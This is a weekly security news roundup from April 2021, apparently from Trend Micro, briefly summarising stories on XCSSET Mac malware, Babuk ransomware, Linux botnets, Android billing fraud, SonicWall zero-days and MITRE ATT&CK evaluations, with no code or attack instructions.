Cyber Threats
This Week in Security News - April 23, 2021
XCSSET Quickly Adapts to Macs and Babuk Ransomware Gang Claims Decryptor Repaired
Welcome to our weekly roundup, where we share what you need to know about cybersecurity news and events that happened over the past few days. This week, read about why the Babuk ransomware gang posted a message on its website saying it had repaired a defect in the decryptor it provides to victims. Also, learn how XCSSET adapted itself to ARM64 and x86_x64 Macs.
Read on:
XCSSET Quickly Adapts to MacOS 11 and M1-Based Macs
XCSSET, which targeted Mac users by infecting Xcode projects was initially reported as a malware family but is now classified as an ongoing campaign. This blog from Trend Micro details new research regarding XCSSET, including the ways in which it has adapted itself to work on both ARM64 and x86_x64 Macs, as well as other notable payload changes.
PR Campaign: Babuk Ransomware Gang Claims Decryptor Repaired
The Babuk ransomware gang launched a public relations campaign, posting a message on its website saying it had repaired a defect in the decryptor it provides to victims who pay the ransom demand. Erin Sindelar, threat researcher at Trend Micro, says ransomware gangs are now more frequently posting messages like this to encourage victims to pay.
Tor-Based Botnet Malware Targets Linux Systems, Abuses Cloud Management Tools
In this blog from Trend Micro, learn some of the emerging techniques used among malicious actors targeting Linux systems: the use of Tor through a network of proxies using the Socks5 protocol, the abuse of legitimate DevOps tools, the subsequent downloads of malware samples based on the architecture, the removal or deactivation of competing malicious cryptocurrency miners, and other detection and analysis-evasive features.
Over 750,000 Users Downloaded New Billing Fraud Apps from Google Play Store
Researchers have uncovered a new set of fraudulent Android apps in the Google Play store that were found to hijack SMS message notifications for carrying out billing fraud, attracting more than 700,000 downloads before they were discovered and removed from the platform. In this article, Trend Micro researchers share how the Joker malware operators are likely profiting from this scheme.
Carbanak and FIN7 Attack Techniques
This week, the results of this year's MITRE Engenuity ATT&CK Evaluations were released, which focused on Carbanak+FIN7. These financially motivated threat groups often enter systems through spear phishing tactics. After gaining a foothold in the system, the dynamic data exchange feature in Windows and legitimate cloud-based services will then be abused to deliver the malware or to establish command-and-control communication.
Hackers Pose as Bloomberg Employees in Email Scam
Hackers are impersonating Bloomberg employees to install remote access software on target computers. The ruse seeks to capitalize on the influence of Bloomberg Industry Group, sending fake Bloomberg invoices that are laced with a remote access trojan (RAT) that could be used to surveil computer networks or steal data. The goal of the malicious email campaigns, and exactly who was targeted, remain unclear.
The Storybook Approach to MITRE ATT&CK
In this blog, read Trend Micro’s breakdown of this year’s MITRE Engenuity ATT&CK Evaluations story, which simulates techniques associated with notorious threat groups Carbanak and FIN7 to test solutions' ability to detect and stop APT & Targeted Attacks. Trend Micro’s Vision One platform detected and prevented 90% of attack simulations through automated detection and response very early on in each test.
Hackers Found Leveraging Three SonicWall Zero-Day Vulnerabilities
Attackers that seem to have “intimate knowledge” of the SonicWall Email Security product have been discovered leveraging three zero-day vulnerabilities in the popular enterprise solution. Exploited in conjunction, the flaws allowed the attacker to obtain administrative access and code execution on a SonicWall ES device, then install a backdoor, access files and emails, and move laterally into the victim organization’s network.
Fundamental Security Risks in Robot Languages
Trend Micro analyzed a total of 100 task programs written in the programming languages of eight major vendors in the industrial robot industry to determine the security risks of language design itself. It was found that the programming languages of industrial robots have a technical security risk that "basic functions of systems can be used unconditionally without any confirmation of permissions".
Attackers Heavily Targeting VPN Vulnerabilities
Attacks on virtual private networks, like those targeting a trio of known vulnerabilities in Pulse Secure appliances, have intensified in recent months along with the increase in remote and hybrid work environments since the outbreak of COVID-19. The trend requires organizations to patch VPN and other externally facing devices as the highest priority.
Connected Car Cybersecurity a Concern for Consumers
Earlier this month, The Hartford Steam Boiler Inspection and Insurance Company (HSB) published a survey report of connected cars. Findings from this survey revealed that that U.S. motorists are concerned about possible cyber-attacks on their connected vehicles. Some of the respondents believe that a hacker could access their vehicles and confront them via their car audio systems or disable safety features.
Trend Micro Integrates Partners into AWS Marketplace
Trend Micro has updated its channel program to drive the recruitment of partners with a deep understanding of how Amazon Web Services infrastructure is configured. In this article, Louise McEvoy, vice president of U.S. channels, shares what the updates to the program means for partners.
What are your thoughts on ransomware gangs posting messages to victims? Share in the comments below or follow me on Twitter to continue the conversation: @JonLClay.